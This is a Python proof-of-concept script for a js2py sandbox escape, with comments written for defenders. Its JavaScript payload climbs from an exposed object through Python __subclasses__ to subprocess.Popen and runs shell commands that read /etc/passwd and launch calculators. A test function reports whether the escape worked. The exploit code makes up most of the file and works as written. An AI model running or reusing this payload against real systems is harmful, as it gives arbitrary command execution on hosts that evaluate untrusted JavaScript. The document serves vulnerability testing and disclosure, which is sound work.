import js2py
from sys import version
# JavaScript source handed to js2py.eval_js() by test_poc() below.
#
# What it demonstrates (defender's reading of the script):
#   * The value returned by Object.getOwnPropertyNames({}) is used as a
#     foothold: the script reads the Python attribute `__getattribute__`
#     from it, so a Python-backed object is evidently reachable from
#     inside the JavaScript world instead of being wrapped or filtered.
#   * From there it walks `__class__.__base__` and recurses through
#     `__subclasses__()` until it finds the class whose module is
#     "subprocess" and whose name is "Popen".
#   * That class is called with `cmd`; the trailing `true` appears to land
#     on Popen's `shell` parameter and the -1 values on the pipe
#     parameters -- confirm against the Popen signature in use.
#
# Consequence: JavaScript evaluated through js2py is not confined to the
# interpreter; it can start host processes with the privileges of the
# Python process. Treat js2py as unsafe for untrusted JavaScript unless a
# fixed build is confirmed, and isolate any process that must evaluate
# third-party scripts (separate low-privilege account, container or VM,
# no secrets in the environment).
#
# Detection hint: a Python process that only parses or evaluates
# JavaScript has no reason to spawn a shell or read /etc/passwd; child
# process creation from such a service is worth alerting on.
#
# NOTE: importing this module is harmless, but calling test_poc() runs the
# commands in `cmd` on the local machine -- use a disposable test host.
payload = """
// [+] command goes here:
let cmd = "head -n 1 /etc/passwd; calc; gnome-calculator; kcalc; "
let hacked, bymarve, n11
let getattr, obj
hacked = Object.getOwnPropertyNames({})
bymarve = hacked.__getattribute__
n11 = bymarve("__getattribute__")
obj = n11("__class__").__base__
getattr = obj.__getattribute__
function findpopen(o) {
let result;
for(let i in o.__subclasses__()) {
let item = o.__subclasses__()[i]
if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
return item
}
if(item.__name__ != "type" && (result = findpopen(item))) {
return result
}
}
}
n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(n11)
n11
"""
def test_poc():
    """Report whether evaluating ``payload`` escaped the js2py sandbox.

    The payload asks the host to print the first line of /etc/passwd; the
    check passes when the text ``root:x:0:0`` shows up in the ``repr`` of
    whatever ``js2py.eval_js`` returns.

    Returns:
        True if the marker text is present in the evaluation result,
        False otherwise.
    """
    marker = "root:x:0:0"
    try:
        output = repr(js2py.eval_js(payload))
    except Exception:
        # Every failure (parse error, blocked attribute access, missing
        # binary, ...) collapses into False, so a False result means
        # "this payload did not work here", not "this install is safe".
        return False
    return marker in output
def main():
    """Run the check once and print the verdict with the interpreter version."""
    if test_poc():
        verdict = "Success! the vulnerability exists for python "
    else:
        verdict = "Failed for python "
    # `version` is sys.version, so the report records which interpreter
    # build the result applies to.
    print(verdict + repr(version))
# Only run the check when executed as a script, so importing this module
# (for example to inspect `payload`) never evaluates it.
if __name__ == "__main__":
    main()